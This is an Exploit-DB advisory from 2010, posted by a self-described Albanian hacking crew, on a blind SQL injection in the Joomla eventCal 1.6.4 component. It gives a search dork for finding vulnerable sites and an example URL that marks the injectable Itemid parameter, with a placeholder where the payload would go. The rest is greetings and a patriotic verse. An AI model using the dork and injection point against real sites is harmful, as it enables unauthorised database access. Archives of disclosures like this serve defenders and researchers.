Joomla! Component eventCal 1.6.4 - Blind SQL Injection

EDB-ID:

14187




Platform:

PHP

Date:

2010-07-03


[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://a-h-crew.net    
[~] Download App:http://joomlacode.org/gf/project/eventcal/frs/
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
eventCal is a calendar component for
Joomla!. It enables you to provide a
month, week and day-overview of events
to your users. If enabled, users will
be able to submit events from the
frontend of your site directly into the
calendar.
=========================================

[+] Dork: inurl:"com_eventcal"

==========================================


[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[Exploit]:  http://127.0.0.1/path/index.php?option=com_eventcal&Itemid=[BLIND SQL-i] 



===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================